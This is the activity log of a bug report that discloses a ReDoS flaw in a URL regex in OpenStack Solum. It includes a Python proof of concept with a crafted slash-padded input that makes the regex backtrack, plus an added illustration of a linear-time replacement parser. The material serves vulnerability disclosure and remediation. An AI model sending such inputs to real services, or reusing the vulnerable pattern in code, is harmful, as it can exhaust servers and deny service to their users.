Activity log for bug #2047505

Date                 Who       What changed

2023-12-27 08:05:14  lujiefsi  bug
New value: added bug

2023-12-27 08:12:28  lujiefsi  description

Old value:

See ReDoS at https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS. The PoC is here:

```
# ./openstack/solum/solum/api/handlers/common.py #22
import re
import datetime

# The reported pattern: three (.+) groups with no fixed delimiter between the
# last two, so an input that cannot match is retried over every way of
# splitting it between the groups before the search gives up.
pt = re.compile(r'^(http://|https://|git@)(.+)(/|:/)(.+)(.+)(\.git)')


def split(x):
    # A valid scheme prefix followed by x slashes and no ".git" suffix, so the
    # search can only fail, and the time it takes grows with x.
    data = 'https://git' + '/' * x
    starttime = datetime.datetime.now()
    pt.search(data)
    endtime = datetime.datetime.now()
    # .seconds is the whole-second part of the elapsed time
    print("string length = " + str(x) + " time cost=" + str((endtime - starttime).seconds) + " seconds")


split(3)
split(30)
split(300)
split(3000)
```

New value:

Please check this website (https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) for the basic concept of ReDoS. The vulnerable regex is at https://github.com/openstack/solum/blob/42575ef1316983e4d48b89ecf9d8a71e899f18db/solum/api/handlers/language_pack_handler.py#L104. The PoC is here:

```
# ./openstack/solum/solum/api/handlers/common.py #22
import re
import datetime

# The reported pattern: three (.+) groups with no fixed delimiter between the
# last two, so an input that cannot match is retried over every way of
# splitting it between the groups before the search gives up.
pt = re.compile(r'^(http://|https://|git@)(.+)(/|:/)(.+)(.+)(\.git)')


def split(x):
    # A valid scheme prefix followed by x slashes and no ".git" suffix, so the
    # search can only fail, and the time it takes grows with x.
    data = 'https://git' + '/' * x
    starttime = datetime.datetime.now()
    pt.search(data)
    endtime = datetime.datetime.now()
    # .seconds is the whole-second part of the elapsed time
    print("string length = " + str(x) + " time cost=" + str((endtime - starttime).seconds) + " seconds")


split(3)
split(30)
split(300)
split(3000)
```

2023-12-29 14:43:18  lujiefsi  summary
Old value: Redos in https://github.com/openstack/solum/blob/42575ef1316983e4d48b89ecf9d8a71e899f18db/solum/api/handlers/language_pack_handler.py#L104
New value: Redos in at language_pack_handler.py#L104

2023-12-29 14:43:40  lujiefsi  description
Old value: identical to the New value of the 2023-12-27 08:12:28 entry above.
New value: the same text, except that the first line of the PoC (the comment `# ./openstack/solum/solum/api/handlers/common.py #22`) is removed.

2023-12-29 14:45:04  lujiefsi  summary
Old value: Redos in at language_pack_handler.py#L104
New value: Redos in at common.py#L20

2023-12-29 14:45:06  lujiefsi  description
Old value: identical to the New value of the 2023-12-29 14:43:40 entry above.

New value:

Please check this website (https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) for the basic concept of ReDoS. The vulnerable regex is at https://github.com/openstack/solum/blob/42575ef1316983e4d48b89ecf9d8a71e899f18db/solum/api/handlers/common.py#L20. The PoC is here:

```
import re
import datetime

# The reported pattern: three (.+) groups with no fixed delimiter between the
# last two, so an input that cannot match is retried over every way of
# splitting it between the groups before the search gives up.
pt = re.compile(r'^(http://|https://|git@)(.+)(/|:/)(.+)(.+)(\.git)')


def split(x):
    # A valid scheme prefix followed by x slashes and no ".git" suffix, so the
    # search can only fail, and the time it takes grows with x.
    data = 'https://git' + '/' * x
    starttime = datetime.datetime.now()
    pt.search(data)
    endtime = datetime.datetime.now()
    # .seconds is the whole-second part of the elapsed time
    print("string length = " + str(x) + " time cost=" + str((endtime - starttime).seconds) + " seconds")


split(3)
split(30)
split(300)
split(3000)
```

2024-01-22 04:13:52  lujiefsi  information type
Old value: Private Security
New value: Public Security
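The following is an added example and is not code from the bug report or from the Solum project. It puts the reported pattern next to a hypothetical linear-time replacement, `parse_git_url`, which recognises the same three URL forms (`http://`, `https://`, `git@`) and the `.git` suffix with `startswith`/`partition` instead of a regex, so every character of the input is visited once and a non-matching input is rejected immediately. The function name, the `SCHEMES` tuple and the `timed` helper are assumptions made for this illustration; the project's actual fix is not shown here, and the demo runs the reported pattern only on short inputs.

```python
import re
import time

# The pattern quoted in the bug report, kept here only for comparison.
VULNERABLE_RE = re.compile(r'^(http://|https://|git@)(.+)(/|:/)(.+)(.+)(\.git)')

# Hypothetical replacement (assumption, not Solum's fix). The three (.+)
# groups of the original can each claim any prefix of what is left, so a
# failing search is retried over O(n^3) split points. Plain string
# operations do one left-to-right pass and never backtrack.
SCHEMES = ('http://', 'https://', 'git@')


def parse_git_url(url):
    """Return (scheme, host, path) for a repository URL ending in ".git".

    Accepts the same shapes the reported pattern was written for:
    http://host/path.git, https://host/path.git, git@host:path.git and
    git@host:/path.git. Returns None for anything else.
    """
    scheme = next((s for s in SCHEMES if url.startswith(s)), None)
    if scheme is None:
        return None
    rest = url[len(scheme):]
    if not rest.endswith('.git'):
        return None          # rejected in O(1), whatever the length of rest
    rest = rest[:-len('.git')]
    if scheme == 'git@':
        # scp-like syntax: host and path are separated by ":" or ":/"
        host, sep, path = rest.partition(':')
        path = path.lstrip('/')
    else:
        host, sep, path = rest.partition('/')
    if not (sep and host and path):
        return None
    return scheme, host, path


def timed(fn, arg):
    """Wall-clock seconds taken by a single call of fn(arg)."""
    start = time.perf_counter()
    fn(arg)
    return time.perf_counter() - start


if __name__ == '__main__':
    # Constructed inputs: the bug report's non-matching shape (a scheme,
    # "git", then only slashes) at a few lengths, plus two well-formed URLs.
    for n in (30, 300):
        bad = 'https://git' + '/' * n
        print('reported regex, n=%d: %.3f s' % (n, timed(VULNERABLE_RE.search, bad)))
    huge = 'https://git' + '/' * 300000
    print('parse_git_url, n=300000: %.6f s ->' % timed(parse_git_url, huge),
          parse_git_url(huge))
    print(parse_git_url('https://github.com/openstack/solum.git'))
    print(parse_git_url('git@github.com:openstack/solum.git'))
```

The reported regex's cost grows roughly with the cube of the slash count, while the parser's cost is flat because the missing `.git` suffix is checked before anything else; the same approach works for any "delimiter-free" pattern whose adjacent unbounded groups overlap.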